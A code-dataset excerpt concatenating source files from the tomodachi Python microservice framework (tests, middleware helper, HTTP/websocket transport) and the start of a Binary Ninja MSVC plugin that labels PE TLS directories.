assert queue_name == '540e8e5bc604e4ea618f7e0517a04f030ad1dcbff2e121e9466ddd1c811450bf'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func2', _uuid, True, {})
assert queue_name == '540e8e5bc604e4ea618f7e0517a04f030ad1dcbff2e121e9466ddd1c811450bf'
queue_name = AmqpTransport.get_queue_name('test.topic', 'func', _uuid, True, {'options': {'amqp': {'queue_name_prefix': 'prefix-'}}})
assert queue_name == 'prefix-540e8e5bc604e4ea618f7e0517a04f030ad1dcbff2e121e9466ddd1c811450bf'
def test_publish_invalid_credentials(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service('tests/services/dummy_service.py', monkeypatch)
instance = services.get('test_dummy')
with pytest.raises(AmqpException):
loop.run_until_complete(AmqpTransport.publish(instance, 'data', 'test.topic', wait=True))
os.kill(os.getpid(), signal.SIGINT)
loop.run_until_complete(future)
out, err = capsys.readouterr()
assert 'Unable to connect [amqp] to 127.0.0.1:54321' in err
assert out == ''
```
#### File: tomodachi/tests/test_schedule_service.py
```python
import asyncio
from typing import Any
from run_test_service_helper import start_service
def test_schedule_service(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service('tests/services/schedule_service.py', monkeypatch)
assert services is not None
assert len(services) == 1
instance = services.get('test_schedule')
assert instance is not None
assert instance.uuid is not None
async def _async(loop: Any) -> None:
seconds = instance.seconds_triggered
third_seconds_triggered = instance.third_seconds_triggered
await asyncio.sleep(1.5)
assert instance.seconds_triggered > seconds
assert instance.third_seconds_triggered == third_seconds_triggered
seconds = instance.seconds_triggered
await asyncio.sleep(4)
assert instance.seconds_triggered > seconds
assert instance.third_seconds_triggered > third_seconds_triggered
loop.run_until_complete(_async(loop))
instance.stop_service()
loop.run_until_complete(future)
```
#### File: tomodachi/tests/test_version.py
```python
import tomodachi
def test_version_exists() -> None:
assert tomodachi.__version__ is not None
```
#### File: tomodachi/helpers/middleware.py
```python
import functools
import inspect
from typing import Callable, List, Any, Dict
async def execute_middlewares(func: Callable, routine_func: Callable, middlewares: List, *args: Any) -> Any:
if middlewares:
middleware_context = {} # type: Dict
async def middleware_bubble(idx: int = 0, *ma: Any, **mkw: Any) -> Any:
@functools.wraps(func)
async def _func(*a: Any, **kw: Any) -> Any:
return await middleware_bubble(idx + 1, *a, **kw)
if middlewares and len(middlewares) <= idx + 1:
_func = routine_func
middleware = middlewares[idx] # type: Callable
arg_len = len(inspect.getfullargspec(middleware).args) - (len(inspect.getfullargspec(middleware).defaults) if inspect.getfullargspec(middleware).defaults else 0)
middleware_arguments = [_func, *args, middleware_context][0:arg_len]
return await middleware(*middleware_arguments, *ma, **mkw)
return_value = await middleware_bubble()
else:
return_value = await routine_func()
return return_value
```
#### File: tomodachi/tomodachi/__init__.py
```python
from typing import Any, Optional
import inspect
from tomodachi.__version__ import __version__, __version_info__ # noqa
try:
import tomodachi.helpers.logging
from tomodachi.invoker import decorator
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.amqp import (amqp,
amqp_publish)
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.aws_sns_sqs import (aws_sns_sqs,
aws_sns_sqs_publish)
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.http import (http,
http_error,
http_static,
websocket,
ws,
get_http_response_status,
HttpException,
Response as HttpResponse)
except Exception: # pragma: no cover
pass
try:
from tomodachi.transport.schedule import (schedule,
heartbeat,
minutely,
hourly,
daily,
monthly)
except Exception: # pragma: no cover
pass
__all__ = ['service', 'Service', '__version__', '__version_info__',
'decorator', 'set_service', 'get_service', 'get_instance',
'amqp', 'amqp_publish',
'aws_sns_sqs', 'aws_sns_sqs_publish',
'http', 'http_error', 'http_static', 'websocket', 'ws', 'HttpResponse', 'HttpException',
'schedule', 'heartbeat', 'minutely', 'hourly', 'daily', 'monthly']
CLASS_ATTRIBUTE = 'TOMODACHI_SERVICE_CLASS'
_services = {}
_current_service = {}
def service(cls: Any) -> Any:
setattr(cls, CLASS_ATTRIBUTE, True)
if not getattr(cls, 'log', None):
cls.log = tomodachi.helpers.logging.log
if not getattr(cls, 'log_setup', None):
cls.log_setup = tomodachi.helpers.logging.log_setup
return cls
class Service(object):
TOMODACHI_SERVICE_CLASS = True
log = tomodachi.helpers.logging.log
log_setup = tomodachi.helpers.logging.log_setup
def set_service(name: str, instance: Any) -> None:
_services[name] = instance
_current_service[0] = instance
def get_service(name: Optional[str] = None) -> Any:
if name is None:
if _current_service and len(_current_service):
return _current_service[0]
for k, v in _services.items():
name = k
break
return _services.get(name)
def get_instance(name: Optional[str] = None) -> Any:
# alias for tomodachi.get_service()
return get_service(name)
```
#### File: tomodachi/transport/http.py
```python
import re
import asyncio
import logging
import time
import ipaddress
import os
import pathlib
import inspect
import uuid
import colorama
import functools
from logging.handlers import WatchedFileHandler
from typing import Any, Dict, List, Tuple, Union, Optional, Callable, SupportsInt, Awaitable, Mapping, Iterable # noqa
from multidict import CIMultiDict, CIMultiDictProxy
from aiohttp import web, web_server, web_protocol, web_urldispatcher, hdrs, WSMsgType
from aiohttp.web_fileresponse import FileResponse
from aiohttp.http import HttpVersion
from aiohttp.helpers import BasicAuth
from aiohttp.streams import EofStream
from tomodachi.invoker import Invoker
from tomodachi.helpers.dict import merge_dicts
from tomodachi.helpers.middleware import execute_middlewares
class HttpException(Exception):
def __init__(self, *args: Any, **kwargs: Any) -> None:
self._log_level = kwargs.get('log_level') if kwargs and kwargs.get('log_level') else 'INFO'
class RequestHandler(web_protocol.RequestHandler): # type: ignore
def __init__(self, *args: Any, **kwargs: Any) -> None:
self._server_header = kwargs.pop('server_header', None) if kwargs else None
self._access_log = kwargs.pop('access_log', None) if kwargs else None
super().__init__(*args, **kwargs) # type: ignore
@staticmethod
def get_request_ip(request: Any, context: Optional[Dict] = None) -> Optional[str]:
if request._cache.get('request_ip'):
return str(request._cache.get('request_ip', ''))
if request.transport:
if not context:
context = {}
real_ip_header = context.get('options', {}).get('http', {}).get('real_ip_header', 'X-Forwarded-For')
real_ip_from = context.get('options', {}).get('http', {}).get('real_ip_from', [])
if isinstance(real_ip_from, str):
real_ip_from = [real_ip_from]
peername = request.transport.get_extra_info('peername')
request_ip = None
if peername:
request_ip, _ = peername
if real_ip_header and real_ip_from and request.headers.get(real_ip_header) and request_ip and len(real_ip_from):
if any([ipaddress.ip_address(request_ip) in ipaddress.ip_network(cidr) for cidr in real_ip_from]):
request_ip = request.headers.get(real_ip_header).split(',')[0].strip().split(' ')[0].strip()
request._cache['request_ip'] = request_ip
return request_ip
return None
@staticmethod
def colorize_status(text: Optional[Union[str, int]], status: Optional[Union[str, int, bool]] = False) -> str:
if status is False:
status = text
status_code = str(status) if status else None
if status_code and not logging.getLogger('transport.http').handlers:
output_text = str(text) if text else ''
color = None
if status_code == '101':
color = colorama.Fore.CYAN
elif status_code[0] == '2':
color = colorama.Fore.GREEN
elif status_code[0] == '3' or status_code == '499':
color = colorama.Fore.YELLOW
elif status_code[0] == '4':
color = colorama.Fore.RED
elif status_code[0] == '5':
color = colorama.Fore.WHITE + colorama.Back.RED
if color:
return '{}{}{}'.format(color, output_text, colorama.Style.RESET_ALL)
return output_text
return str(text) if text else ''
def handle_error(self, request: Any, status: int = 500, exc: Any = None, message: Optional[str] = None) -> web.Response:
"""Handle errors.
Returns HTTP response with specific status code. Logs additional
information. It always closes current connection."""
if self.transport is None:
# client has been disconnected during writing.
if self._access_log:
request_ip = RequestHandler.get_request_ip(request, None)
version_string = None
if isinstance(request.version, HttpVersion):
version_string = 'HTTP/{}.{}'.format(request.version.major, request.version.minor)
logging.getLogger('transport.http').info('[{}] [{}] {} {} "{} {}{}{}" - {} "{}" -'.format(
RequestHandler.colorize_status('http', 499),
RequestHandler.colorize_status(499),
request_ip or '',
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.method,
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
' {}'.format(version_string) if version_string else '',
request.content_length if request.content_length is not None else '-',
request.headers.get('User-Agent', '').replace('"', '')
))
headers = {}
headers[hdrs.CONTENT_TYPE] = 'text/plain; charset=utf-8'
msg = '' if status == 500 or not message else message
headers[hdrs.CONTENT_LENGTH] = str(len(msg))
headers[hdrs.SERVER] = self._server_header or ''
resp = web.Response(status=status, # type: ignore
text=msg,
headers=headers) # type: web.Response
resp.force_close() # type: ignore
# some data already got sent, connection is broken
if request.writer.output_size > 0 or self.transport is None:
self.force_close() # type: ignore
elif self.transport is not None:
request_ip = RequestHandler.get_request_ip(request, None)
if not request_ip:
peername = request.transport.get_extra_info('peername')
if peername:
request_ip, _ = peername
if self._access_log:
logging.getLogger('transport.http').info('[{}] [{}] {} {} "INVALID" {} - "" -'.format(
RequestHandler.colorize_status('http', status),
RequestHandler.colorize_status(status),
request_ip or '',
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
len(msg)
))
return resp
class Server(web_server.Server): # type: ignore
def __init__(self, *args: Any, **kwargs: Any) -> None:
self._server_header = kwargs.pop('server_header', None) if kwargs else None
self._access_log = kwargs.pop('access_log', None) if kwargs else None
super().__init__(*args, **kwargs) # type: ignore
def __call__(self) -> RequestHandler:
return RequestHandler(
self, loop=self._loop, server_header=self._server_header, access_log=self._access_log,
**self._kwargs)
class DynamicResource(web_urldispatcher.DynamicResource): # type: ignore
def __init__(self, pattern: Any, *, name: Optional[str] = None) -> None:
self._routes = [] # type: List
self._name = name
self._pattern = pattern
self._formatter = ''
class Response(object):
def __init__(self, *, body: Optional[Union[bytes, str]] = None, status: int = 200, reason: Optional[str] = None, headers: Optional[Union[Dict, CIMultiDict, CIMultiDictProxy]] = None, content_type: Optional[str] = None, charset: Optional[str] = None) -> None:
if headers is None:
headers = CIMultiDict()
elif not isinstance(headers, (CIMultiDict, CIMultiDictProxy)):
headers = CIMultiDict(headers)
self._body = body
self._status = status
self._reason = reason
self._headers = headers
self.content_type = content_type if hdrs.CONTENT_TYPE not in headers else None
self.charset = charset if hdrs.CONTENT_TYPE not in headers else None
self.missing_content_type = hdrs.CONTENT_TYPE not in headers and not content_type and not charset
def get_aiohttp_response(self, context: Dict, default_charset: Optional[str] = None, default_content_type: Optional[str] = None) -> web.Response:
if self.missing_content_type:
self.charset = default_charset
self.content_type = default_content_type
charset = self.charset
if hdrs.CONTENT_TYPE in self._headers and ';' in self._headers[hdrs.CONTENT_TYPE]:
try:
charset = str([v for v in self._headers[hdrs.CONTENT_TYPE].split(';') if 'charset=' in v][0]).replace('charset=', '').strip()
except IndexError:
pass
elif hdrs.CONTENT_TYPE in self._headers and ';' not in self._headers[hdrs.CONTENT_TYPE]:
charset = None
if self._body and not isinstance(self._body, bytes) and charset:
body = self._body
try:
body_value = body.encode(charset.lower())
except (ValueError, LookupError, UnicodeEncodeError) as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
raise web.HTTPInternalServerError() from e # type: ignore
elif self._body:
body_value = self._body.encode() if not isinstance(self._body, bytes) else self._body
else:
body_value = b''
response = web.Response(body=body_value, # type: ignore
status=self._status,
reason=self._reason,
headers=self._headers,
content_type=self.content_type,
charset=self.charset) # type: web.Response
return response
class HttpTransport(Invoker):
async def request_handler(cls: Any, obj: Any, context: Dict, func: Any, method: str, url: str, ignore_logging: Union[bool, List[int], Tuple[int]] = False, pre_handler_func: Optional[Callable] = None) -> Any:
pattern = r'^{}$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', url)))
compiled_pattern = re.compile(pattern)
default_content_type = context.get('options', {}).get('http', {}).get('content_type', 'text/plain')
default_charset = context.get('options', {}).get('http', {}).get('charset', 'utf-8')
if default_content_type is not None and ";" in default_content_type:
# for backwards compability
try:
default_charset = str([v for v in default_content_type.split(';') if 'charset=' in v][0]).replace('charset=', '').strip()
default_content_type = str([v for v in default_content_type.split(';')][0]).strip()
except IndexError:
pass
async def handler(request: web.Request) -> Union[web.Response, web.FileResponse]:
result = compiled_pattern.match(request.path)
values = inspect.getfullargspec(func)
kwargs = {k: values.defaults[i] for i, k in enumerate(values.args[len(values.args) - len(values.defaults):])} if values.defaults else {}
if result:
for k, v in result.groupdict().items():
kwargs[k] = v
@functools.wraps(func)
async def routine_func(*a: Any, **kw: Any) -> Union[str, bytes, Dict, List, Tuple, web.Response, Response]:
routine = func(*(obj, request, *a), **merge_dicts(kwargs, kw))
return_value = (await routine) if isinstance(routine, Awaitable) else routine # type: Union[str, bytes, Dict, List, Tuple, web.Response, Response]
return return_value
if pre_handler_func:
await pre_handler_func(obj, request)
return_value = await execute_middlewares(func, routine_func, context.get('http_middleware', []), *(obj, request))
response = await resolve_response(return_value, request=request, context=context, default_content_type=default_content_type, default_charset=default_charset)
return response
context['_http_routes'] = context.get('_http_routes', [])
route_context = {'ignore_logging': ignore_logging}
if isinstance(method, list) or isinstance(method, tuple):
for m in method:
context['_http_routes'].append((m.upper(), pattern, handler, route_context))
else:
context['_http_routes'].append((method.upper(), pattern, handler, route_context))
start_func = cls.start_server(obj, context)
return (await start_func) if start_func else None
async def static_request_handler(cls: Any, obj: Any, context: Dict, func: Any, path: str, base_url: str, ignore_logging: Union[bool, List[int], Tuple[int]] = False) -> Any:
if '?P#' not in base_url:
pattern = r'^{}(?P#.+?)$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', base_url)))
else:
pattern = r'^{}$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', base_url)))
compiled_pattern = re.compile(pattern)
if path.startswith('/'):
path = os.path.dirname(path)
else:
path = '{}/{}'.format(os.path.dirname(context.get('context', {}).get('_service_file_path')), path)
if not path.endswith('/'):
path = '{}/'.format(path)
async def handler(request: web.Request) -> web.Response:
result = compiled_pattern.match(request.path)
filename = result.groupdict()['filename'] if result else ''
filepath = '{}{}'.format(path, filename)
try:
if os.path.commonprefix((os.path.realpath(filepath), os.path.realpath(path))) != os.path.realpath(path) or os.path.isdir(filepath) or not os.path.exists(filepath):
raise web.HTTPNotFound() # type: ignore
pathlib.Path(filepath).open('r')
response = FileResponse(path=filepath, # type: ignore
chunk_size=256 * 1024) # type: web.Response
return response
except PermissionError as e:
raise web.HTTPForbidden() # type: ignore
route_context = {'ignore_logging': ignore_logging}
context['_http_routes'] = context.get('_http_routes', [])
context['_http_routes'].append(('GET', pattern, handler, route_context))
start_func = cls.start_server(obj, context)
return (await start_func) if start_func else None
async def error_handler(cls: Any, obj: Any, context: Dict, func: Any, status_code: int) -> Any:
default_content_type = context.get('options', {}).get('http', {}).get('content_type', 'text/plain')
default_charset = context.get('options', {}).get('http', {}).get('charset', 'utf-8')
if default_content_type is not None and ";" in default_content_type:
# for backwards compability
try:
default_charset = str([v for v in default_content_type.split(';') if 'charset=' in v][0]).replace('charset=', '').strip()
default_content_type = str([v for v in default_content_type.split(';')][0]).strip()
except IndexError:
pass
async def handler(request: web.Request) -> web.Response:
request._cache['error_status_code'] = status_code
values = inspect.getfullargspec(func)
kwargs = {k: values.defaults[i] for i, k in enumerate(values.args[len(values.args) - len(values.defaults):])} if values.defaults else {}
@functools.wraps(func)
async def routine_func(*a: Any, **kw: Any) -> Union[str, bytes, Dict, List, Tuple, web.Response, Response]:
routine = func(*(obj, request, *a), **merge_dicts(kwargs, kw))
return_value = (await routine) if isinstance(routine, Awaitable) else routine # type: Union[str, bytes, Dict, List, Tuple, web.Response, Response]
return return_value
return_value = await execute_middlewares(func, routine_func, context.get('http_middleware', []), *(obj, request))
response = await resolve_response(return_value, request=request, context=context, status_code=status_code, default_content_type=default_content_type, default_charset=default_charset)
return response
context['_http_error_handler'] = context.get('_http_error_handler', {})
context['_http_error_handler'][int(status_code)] = handler
start_func = cls.start_server(obj, context)
return (await start_func) if start_func else None
async def websocket_handler(cls: Any, obj: Any, context: Dict, func: Any, url: str) -> Any:
pattern = r'^{}$'.format(re.sub(r'\$$', '', re.sub(r'^\^?(.*)$', r'\1', url)))
compiled_pattern = re.compile(pattern)
access_log = context.get('options', {}).get('http', {}).get('access_log', True)
async def _pre_handler_func(obj: Any, request: web.Request) -> None:
request._cache['is_websocket'] = True
request._cache['websocket_uuid'] = str(uuid.uuid4())
@functools.wraps(func)
async def _func(obj: Any, request: web.Request, *a: Any, **kw: Any) -> None:
websocket = web.WebSocketResponse() # type: ignore
request_ip = RequestHandler.get_request_ip(request, context)
try:
await websocket.prepare(request)
except Exception:
try:
await websocket.close()
except Exception:
pass
if access_log:
logging.getLogger('transport.http').info('[{}] {} {} "CANCELLED {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 101),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'-'
))
return
context['_http_open_websockets'] = context.get('_http_open_websockets', [])
context['_http_open_websockets'].append(websocket)
if access_log:
logging.getLogger('transport.http').info('[{}] {} {} "OPEN {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 101),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'-'
))
result = compiled_pattern.match(request.path)
values = inspect.getfullargspec(func)
kwargs = {k: values.defaults[i] for i, k in enumerate(values.args[len(values.args) - len(values.defaults):])} if values.defaults else {}
if result:
for k, v in result.groupdict().items():
kwargs[k] = v
if len(values.args) - (len(values.defaults) if values.defaults else 0) >= 3:
# If the function takes a third required argument the value will be filled with the request object
a = a + (request,)
if 'request' in values.args and (len(values.args) - (len(values.defaults) if values.defaults else 0) < 3 or values.args[2] != 'request'):
kwargs['request'] = request
try:
routine = func(*(obj, websocket, *a), **merge_dicts(kwargs, kw))
callback_functions = (await routine) if isinstance(routine, Awaitable) else routine # type: Optional[Union[Tuple, Callable]]
except Exception as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
try:
await websocket.close()
except Exception:
pass
try:
context['_http_open_websockets'].remove(websocket)
except Exception:
pass
if access_log:
logging.getLogger('transport.http').info('[{}] {} {} "{} {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 500),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
RequestHandler.colorize_status('ERROR', 500),
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'-'
))
return
_receive_func = None
_close_func = None
if callback_functions and isinstance(callback_functions, tuple):
try:
_receive_func, _close_func = callback_functions
except ValueError:
_receive_func, = callback_functions
elif callback_functions:
_receive_func = callback_functions
try:
async for message in websocket:
if message.type == WSMsgType.TEXT:
if _receive_func:
try:
await _receive_func(message.data)
except Exception as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
elif message.type == WSMsgType.ERROR:
if not context.get('log_level') or context.get('log_level') in ['DEBUG']:
ws_exception = websocket.exception()
if isinstance(ws_exception, (EofStream, RuntimeError)):
pass
elif isinstance(ws_exception, Exception):
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(ws_exception)))
else:
logging.getLogger('transport.http').warning('Websocket exception: "{}"'.format(ws_exception))
elif message.type == WSMsgType.CLOSED:
break # noqa
except Exception as e:
pass
finally:
if _close_func:
try:
await _close_func()
except Exception as e:
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
try:
await websocket.close()
except Exception:
pass
try:
context['_http_open_websockets'].remove(websocket)
except Exception:
pass
return await cls.request_handler(cls, obj, context, _func, 'GET', url, pre_handler_func=_pre_handler_func)
async def start_server(obj: Any, context: Dict) -> Optional[Callable]:
if context.get('_http_server_started'):
return None
context['_http_server_started'] = True
server_header = context.get('options', {}).get('http', {}).get('server_header', 'tomodachi')
access_log = context.get('options', {}).get('http', {}).get('access_log', True)
logger_handler = None
if isinstance(access_log, str):
try:
wfh = WatchedFileHandler(filename=access_log)
except FileNotFoundError as e:
logging.getLogger('transport.http').warning('Unable to use file for access log - invalid path ("{}")'.format(access_log))
raise HttpException(str(e)) from e
except PermissionError as e:
logging.getLogger('transport.http').warning('Unable to use file for access log - invalid permissions ("{}")'.format(access_log))
raise HttpException(str(e)) from e
wfh.setLevel(logging.DEBUG)
logging.getLogger('transport.http').setLevel(logging.DEBUG)
logging.getLogger('transport.http').info('Logging to "{}"'.format(access_log))
logger_handler = wfh
logging.getLogger('transport.http').addHandler(logger_handler)
async def _start_server() -> None:
loop = asyncio.get_event_loop()
logging.getLogger('aiohttp.access').setLevel(logging.WARNING)
@web.middleware
async def middleware(request: web.Request, handler: Callable) -> web.Response:
async def func() -> web.Response:
request_ip = RequestHandler.get_request_ip(request, context)
if request.headers.get('Authorization'):
try:
request._cache['auth'] = BasicAuth.decode(request.headers.get('Authorization'))
except ValueError:
pass
if access_log:
timer = time.time()
response = web.Response(status=503, # type: ignore
headers={}) # type: web.Response
try:
response = await handler(request)
response.headers[hdrs.SERVER] = server_header or ''
except web.HTTPException as e:
error_handler = context.get('_http_error_handler', {}).get(e.status, None)
if error_handler:
response = await error_handler(request)
response.headers[hdrs.SERVER] = server_header or ''
else:
response = e
response.headers[hdrs.SERVER] = server_header or ''
response.body = str(e).encode('utf-8')
except Exception as e:
error_handler = context.get('_http_error_handler', {}).get(500, None)
logging.getLogger('exception').exception('Uncaught exception: {}'.format(str(e)))
if error_handler:
response = await error_handler(request)
response.headers[hdrs.SERVER] = server_header or ''
else:
response = web.HTTPInternalServerError() # type: ignore
response.headers[hdrs.SERVER] = server_header or ''
response.body = b''
finally:
if not request.transport:
response = web.Response(status=499, # type: ignore
headers={}) # type: web.Response
response._eof_sent = True
if access_log:
request_time = time.time() - timer
version_string = None
if isinstance(request.version, HttpVersion):
version_string = 'HTTP/{}.{}'.format(request.version.major, request.version.minor)
if not request._cache.get('is_websocket'):
status_code = response.status if response is not None else 500
ignore_logging = getattr(handler, 'ignore_logging', False)
if ignore_logging is True:
pass
elif isinstance(ignore_logging, (list, tuple)) and status_code in ignore_logging:
pass
else:
logging.getLogger('transport.http').info('[{}] [{}] {} {} "{} {}{}{}" {} {} "{}" {}'.format(
RequestHandler.colorize_status('http', status_code),
RequestHandler.colorize_status(status_code),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.method,
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
' {}'.format(version_string) if version_string else '',
response.content_length if response is not None and response.content_length is not None else '-',
request.content_length if request.content_length is not None else '-',
request.headers.get('User-Agent', '').replace('"', ''),
'{0:.5f}s'.format(round(request_time, 5))
))
else:
logging.getLogger('transport.http').info('[{}] {} {} "CLOSE {}{}" {} "{}" {}'.format(
RequestHandler.colorize_status('websocket', 101),
request_ip,
'"{}"'.format(request._cache['auth'].login.replace('"', '')) if request._cache.get('auth') and getattr(request._cache.get('auth'), 'login', None) else '-',
request.path,
'?{}'.format(request.query_string) if request.query_string else '',
request._cache.get('websocket_uuid', ''),
request.headers.get('User-Agent', '').replace('"', ''),
'{0:.5f}s'.format(round(request_time, 5))
))
if isinstance(response, (web.HTTPException, web.HTTPInternalServerError)):
raise response
return response
return await asyncio.shield(func())
app = web.Application(middlewares=[middleware], # type: ignore
client_max_size=(1024 ** 2) * 100) # type: web.Application
app._set_loop(None) # type: ignore
for method, pattern, handler, route_context in context.get('_http_routes', []):
try:
compiled_pattern = re.compile(pattern)
except re.error as exc:
raise ValueError(
"Bad pattern '{}': {}".format(pattern, exc)) from None
ignore_logging = route_context.get('ignore_logging', False)
setattr(handler, 'ignore_logging', ignore_logging)
resource = DynamicResource(compiled_pattern)
app.router.register_resource(resource) # type: ignore
if method.upper() == 'GET':
resource.add_route('HEAD', handler, expect_handler=None) # type: ignore
resource.add_route(method.upper(), handler, expect_handler=None) # type: ignore
port = context.get('options', {}).get('http', {}).get('port', 9700)
host = context.get('options', {}).get('http', {}).get('host', '0.0.0.0')
try:
app.freeze()
server_task = loop.create_server(Server(app._handle, request_factory=app._make_request, server_header=server_header or '', access_log=access_log, keepalive_timeout=0, tcp_keepalive=False), host, port) # type: ignore
server = await server_task # type: ignore
except OSError as e:
error_message = re.sub('.*: ', '', e.strerror)
logging.getLogger('transport.http').warning('Unable to bind service [http] to http://{}:{}/ ({})'.format('127.0.0.1' if host == '0.0.0.0' else host, port, error_message))
raise HttpException(str(e), log_level=context.get('log_level')) from e
port = int(server.sockets[0].getsockname()[1])
context['_http_port'] = port
stop_method = getattr(obj, '_stop_service', None)
async def stop_service(*args: Any, **kwargs: Any) -> None:
if stop_method:
await stop_method(*args, **kwargs)
open_websockets = context.get('_http_open_websockets', [])[:]
for websocket in open_websockets:
try:
await websocket.close()
except Exception:
pass
server.close()
await app.shutdown()
if logger_handler:
logging.getLogger('transport.http').removeHandler(logger_handler)
await app.cleanup()
setattr(obj, '_stop_service', stop_service)
for method, pattern, handler, route_context in context.get('_http_routes', []):
for registry in getattr(obj, 'discovery', []):
if getattr(registry, 'add_http_endpoint', None):
await registry.add_http_endpoint(obj, host, port, method, pattern)
logging.getLogger('transport.http').info('Listening [http] on http://{}:{}/'.format('127.0.0.1' if host == '0.0.0.0' else host, port))
return _start_server
async def resolve_response(value: Union[str, bytes, Dict, List, Tuple, web.Response, Response], request: Optional[web.Request] = None, context: Dict = None, status_code: Optional[Union[str, int]] = None, default_content_type: Optional[str] = None, default_charset: Optional[str] = None) -> web.Response:
if not context:
context = {}
if isinstance(value, Response):
return value.get_aiohttp_response(context, default_content_type=default_content_type, default_charset=default_charset)
if isinstance(value, web.FileResponse):
return value
status = int(status_code) if status_code else (request is not None and request._cache.get('error_status_code', 200)) or 200
headers = None
if isinstance(value, dict):
body = value.get('body')
_status = value.get('status') # type: Optional[SupportsInt]
if _status and isinstance(_status, (int, str, bytes)):
status = int(_status)
_returned_headers = value.get('headers')
if _returned_headers:
returned_headers = _returned_headers # type: Union[Mapping[str, Any], Iterable[Tuple[str, Any]]]
headers = CIMultiDict(returned_headers)
elif isinstance(value, list) or isinstance(value, tuple):
_status = value[0]
if _status and isinstance(_status, (int, str, bytes)):
status = int(_status)
body = value[1]
if len(value) > 2:
returned_headers = value[2]
headers = CIMultiDict(returned_headers)
elif isinstance(value, web.Response):
return value
else:
if value is None:
value = ''
body = value
return Response(body=body, status=status, headers=headers, content_type=default_content_type, charset=default_charset).get_aiohttp_response(context)
async def get_http_response_status(value: Union[str, bytes, Dict, List, Tuple, web.Response, Response, Exception], request: Optional[web.Request] = None, verify_transport: bool = True) -> Optional[int]:
if isinstance(value, Exception) or isinstance(value, web.HTTPException):
status_code = int(getattr(value, 'status', 500)) if value is not None else 500
return status_code
else:
response = await resolve_response(value, request=request)
status_code = int(response.status) if response is not None else 500
if verify_transport and request is not None and request.transport is None:
return 499
else:
return status_code
http = HttpTransport.decorator(HttpTransport.request_handler)
http_error = HttpTransport.decorator(HttpTransport.error_handler)
http_static = HttpTransport.decorator(HttpTransport.static_request_handler)
websocket = HttpTransport.decorator(HttpTransport.websocket_handler)
ws = HttpTransport.decorator(HttpTransport.websocket_handler)
``` |
{
"source": "0x1F9F1/binja-msvc",
"score": 2
} |
#### File: 0x1F9F1/binja-msvc/tls.py
```python
from binaryninja import Symbol, Type, log
from binaryninja.enums import SymbolType
from .utils import BinjaStruct, read_pe_header, check_address
IMAGE_TLS_DIRECTORY32_t = BinjaStruct('<IIIIII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
IMAGE_TLS_DIRECTORY64_t = BinjaStruct('<QQQQII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
def read_tls_directory(view, address):
if view.address_size == 4:
image_tls_directory_t = IMAGE_TLS_DIRECTORY32_t
elif view.address_size == 8:
image_tls_directory_t = IMAGE_TLS_DIRECTORY64_t
else:
raise NotImplementedError()
tls_directory, address = image_tls_directory_t.read(view, address)
return tls_directory, address
def label_tls(view):
pe = read_pe_header(view)
tls_data_directory = pe.OPTIONAL_HEADER.DATA_DIRECTORY[9]
if tls_data_directory.Size:
tls_directory, _ = read_tls_directory(view, view.start + tls_data_directory.VirtualAddress)
if tls_directory is not None:
tls_start_address = tls_directory['StartAddressOfRawData']
tls_end_address = tls_directory['EndAddressOfRawData']
if (tls_start_address < tls_end_address) and check_address(view, tls_start_address) and check_address(view, tls_end_address):
log.log_info('TLS Data @ 0x{0:X}'.format(tls_start_address))
view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_start_address, 'TlsData'))
view.define_user_data_var(tls_start_address, Type.array(Type.int(1, sign = False), tls_end_address - tls_start_address))
tls_index_address = tls_directory['AddressOfIndex']
if check_address(view, tls_index_address):
log.log_info('TLS Index @ 0x{0:X}'.format(tls_index_address))
view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_index_address, 'TlsIndex'))
view.define_user_data_var(tls_index_address, Type.int(4, sign = False))
```
#### File: 0x1F9F1/binja-msvc/unwind.py
```python
from binaryninja import log
from .utils import BinjaStruct, read_pe_header, split_bits, update_percentage
# https://msdn.microsoft.com/en-us/library/ft9x1kdx.aspx
